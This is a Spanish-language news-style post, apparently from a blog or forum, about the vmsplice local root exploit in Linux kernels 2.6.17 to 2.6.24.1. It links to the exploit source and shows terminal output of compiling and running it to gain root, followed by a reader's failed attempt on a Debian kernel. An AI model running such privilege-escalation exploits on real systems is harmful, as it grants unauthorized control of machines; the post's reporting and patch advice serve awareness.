Leemos en Slashdot acerca de la existencia de un exploit que permitiría a un a un usuario hacerse con privilegios de root localmente.
Dicho exploit, y he aquí lo realmente novedoso del asunto, se aprovecharía de un bug presente en la serie 2.6 del Kernel, y que afecta a las versiones comprendidas desde la 2.6.17 hasta 2.6.24.1.
Quienes han descubierto este problema, recomiendan que, si no te fías de tus usuarios, compiles un nuevo kernel, sin vmsplice, que parece ser el origen de este bug.
Esperemos que dentro de muy poco, este desagradable agujero de seguridad este resuelto.
Para amantes del código, aquí podéis echar un vistazo al exploit.
http://www.milw0rm.com/exploits/5092 $ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
-------
----------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Fuente:
http://linux.adslzone.net/2008/02/10/linux-kernel-26-local-root-exploit/
Lo probe en Debian 4.0 etch rc3 y no funciona
dexter4@dexter4:~$ gcc Exploit.c -o Exploit
dexter4@dexter4:~$ whoami
dexter4
dexter4@dexter4:~$ ./Exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] addr: 0xc010f2be
[-] wtf
dexter4@dexter4:~$
dexter4@dexter4:~$ uname -r
2.6.18-6-486
conclusion mi kernel no tiene el bug

Saludos!!!